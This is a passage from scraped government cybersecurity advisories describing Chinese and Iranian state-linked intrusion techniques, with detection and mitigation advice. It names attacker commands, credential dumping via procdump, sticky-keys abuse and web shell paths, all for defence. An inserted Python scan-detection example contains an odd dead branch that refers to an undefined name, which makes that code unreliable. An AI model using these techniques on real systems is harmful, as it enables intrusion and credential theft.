* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]

#### Permission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network.

**Detection and mitigation recommendations:**

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information.
Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

**Defensive tactics and techniques:**

Detect:

* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
* System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]

#### Process Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.

**Detection and mitigation recommendations:**

Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

**Defensive tactics and techniques:**

Detect:

* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
* System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]

#### Network Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.

**Detection and mitigation recommendations:**

* Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation.
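An added example, not from the advisory, of detecting the network service scanning described above from connection logs rather than from host telemetry. It keeps a sliding window per source address and raises one alert the first time a source has touched too many distinct ports on one host (a vertical scan) or one port on too many distinct hosts (a horizontal scan, the `Nbtscan`-style sweep). The log line format, the sixty-second window, the thresholds of ten and the addresses in the constructed sample log are all assumptions for the example; real flow records (firewall, NetFlow, Zeek `conn.log`) carry the same four fields under other names.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # sliding window per source address (assumption)
PORT_THRESHOLD = 10              # distinct ports on one host -> vertical scan
HOST_THRESHOLD = 10              # distinct hosts on one port -> horizontal scan
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_flow(line):
    """Parse one constructed log line of the form
    '<timestamp> src=<ip> dst=<ip> dport=<port> result=<ACCEPT|REJECT>'."""
    ts, *kv = line.split()
    f = dict(p.split("=", 1) for p in kv)
    return {"ts": datetime.strptime(ts, TS_FMT), "src": f["src"], "dst": f["dst"],
            "dport": int(f["dport"]), "result": f["result"]}


def detect_scans(lines):
    """Return one alert per (source, kind, target) the first time its distinct
    port or host count within WINDOW reaches the threshold."""
    events = sorted((parse_flow(line) for line in lines), key=lambda e: e["ts"])
    recent = defaultdict(deque)          # src -> events inside the window
    fired, alerts = set(), []
    for e in events:
        q = recent[e["src"]]
        q.append(e)
        while e["ts"] - q[0]["ts"] > WINDOW:   # expire the old end of the window
            q.popleft()
        ports_by_host, hosts_by_port = defaultdict(set), defaultdict(set)
        for x in q:
            ports_by_host[x["dst"]].add(x["dport"])
            hosts_by_port[x["dport"]].add(x["dst"])
        checks = ([("vertical", h, len(p), PORT_THRESHOLD) for h, p in ports_by_host.items()]
                  + [("horizontal", p, len(h), HOST_THRESH) for p, h in hosts_by_port.items()]
                  if False else
                  [("vertical", h, len(p), PORT_THRESHOLD) for h, p in ports_by_host.items()]
                  + [("horizontal", p, len(h), HOST_THRESHOLD) for p, h in hosts_by_port.items()])
        for kind, target, count, limit in checks:
            key = (e["src"], kind, target)
            if count >= limit and key not in fired:
                fired.add(key)
                alerts.append({"src": e["src"], "kind": kind, "target": target,
                               "count": count, "at": e["ts"].strftime(TS_FMT)})
    return alerts


def build_sample_log():
    """Constructed flow log: 10.0.5.17 probes 16 ports on one server, then
    port 445 on 12 hosts; 10.0.5.20 only talks HTTPS to one server."""
    base = datetime(2021, 7, 19, 14, 2, 0)
    lines = []
    for i, port in enumerate(range(20, 36)):
        t = base + timedelta(seconds=i)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} src=10.0.5.17 dst=10.0.8.4 dport={port} result=REJECT")
    for i in range(1, 13):
        t = base + timedelta(seconds=30 + i)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} src=10.0.5.17 dst=10.0.8.{i} dport=445 result=REJECT")
    for i in range(5):
        t = base + timedelta(seconds=10 * i)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} src=10.0.5.20 dst=10.0.8.4 dport=443 result=ACCEPT")
    return lines


if __name__ == "__main__":
    for alert in detect_scans(build_sample_log()):
        print(alert)
```

The ordinary HTTPS client never trips either threshold, and the scanner produces exactly two alerts rather than one per packet, because the `fired` set suppresses repeats for the same source, kind and target. The segmentation item in the next bullet is what limits how much of the network such a scan can reach in the first place.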
* Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`.
* Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.

**Defensive tactics and techniques:**

Detect:

* Network Traffic Analysis
* Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]

Isolate:

* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

#### Remote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors have been observed using Base64-encoded commands, including `ping`, `net group`, and `net user`, to enumerate target network information.

**Detection and mitigation recommendations:**

Monitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.

**Defensive tactics and techniques:**

Detect:

* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
* User Behavior Analysis
* Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]

### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]

_Table X: Chinese state-sponsored cyber actors' Lateral Movement TTPs with detection and mitigation recommendations_

#### Exploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and
Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.

Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.

**Detection and mitigation recommendations:**

* Disable or remove unnecessary services.
* Minimize permissions and access for service accounts.
* Perform vulnerability scanning and update software regularly.
* Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.

**Defensive tactics and techniques:**

Detect:

* Network Traffic Analysis
* Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]

Isolate:

* Execution Isolation
* Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]

### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]

_Table XI: Chinese state-sponsored cyber actors' Collection TTPs with detection and mitigation recommendations_

#### Archive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors used
compression and encryption of exfiltration files into RAR archives, and subsequently utilized cloud storage services for storage.

**Detection and mitigation recommendations:**

* Scan systems to identify unauthorized archival utilities or methods unusual for the environment.
* Monitor command-line arguments for known archival utilities that are not common in the organization's environment.

**Defensive tactics and techniques:**

Detect:

* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]

Isolate:

* Execution Isolation
* Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)]

#### Clipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]

**Threat actor procedure(s):**

Chinese state-sponsored cyber actors used RDP and executed `rdpclip.exe` to exfiltrate information from the clipboard.

**Detection and mitigation recommendations:**

* Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g.,
excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) 
to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportRequest` PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary 
malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances, Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. 
\n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). 
Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. 
Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework \n\n\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). 
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:30:10", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. 
This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. 
The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). 
It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. 
From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys that was likely used as a password changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. 
The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making it easier for the pre-compiled payloads to avoid detection. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1027/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as a reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of the Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. 
\n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. 
